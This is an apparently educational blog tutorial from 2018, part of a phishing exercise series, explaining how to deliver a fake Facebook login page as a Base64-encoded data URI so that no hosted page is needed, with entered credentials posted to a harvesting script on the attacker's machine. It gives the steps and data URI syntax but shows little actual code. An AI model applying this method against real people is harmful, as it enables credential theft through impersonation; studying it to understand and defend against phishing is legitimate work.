Monday, April 2, 2018

Phishing (II) - Data URIs scheme with Base64 encoding


- Layout for this exercise:

- This exercise is based in the previous one:

- The goal of this exercise is to launch a page-less phishing attack, meaning that there is no need of hosting an html file on a server.

- The phishing bait will be embedded in a URI, using the Data URIs scheme.

1 - Redirecting user input to the attacker machine

- At the attacker machine Windows 10 let's open the index.html file inside xampp > htdocs using Notepad:

- Finding action= and replacing the line with the below string, where is the Windows 10's attacker IP:

- In this way, any user input entered in a connection to the fake web page will be redirected to the file mail.php, where the credentials will be harvested.

2 - Encoding index.html with Base64

- Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation.

- Each Base64 digit represents exactly 6 bits of data, so three bytes (24 bits) can therefore be represented by 4 six-bit Base64 digits:

- Now, using  Base64 encoding scheme, let's encode the whole index.html page, for instance with the tool offered by this website:

- These encoded characters must be copied and stored for further use.

- Finally, before launching the attack let's remove index.html from xampp > htdocs, because this will be a page-less phishing attack:

3 - Data URIs scheme

- The data URIs scheme is an Uniform Resource Identifier (URI) scheme that provides a way to include data in-line in web pages as if they were external resources:

- This technique allows normally separate elements such as images and style sheets to be fetched in a single Hypertext Transfer Protocol (HTTP) request, which may be more efficient than multiple HTTP requests.

- In other words, small files can be incorporated online into documents.

- The syntax of data URI schema using base64 is composed of four parts:

data: <mediatype> ; <base64> , <data>

- In our case let's prepend data:text/html;base64, to the encoded index.html:


1) data: <- prefix for the schema
2) text/html <- MIME data type 
3) ;base64 <- Base64 encoding is in use
4) ,PCFET0.... <- index.html encoded with Base64

4 - Launching the attack

- Now, when the victim enters the data URI schema  into the browser (it could be provided by spam email or social engineering), a Facebook fake home page is presented.

- Entering credentials:

- Immediately a log.txt is created at the attacker side, where email and password are harvested: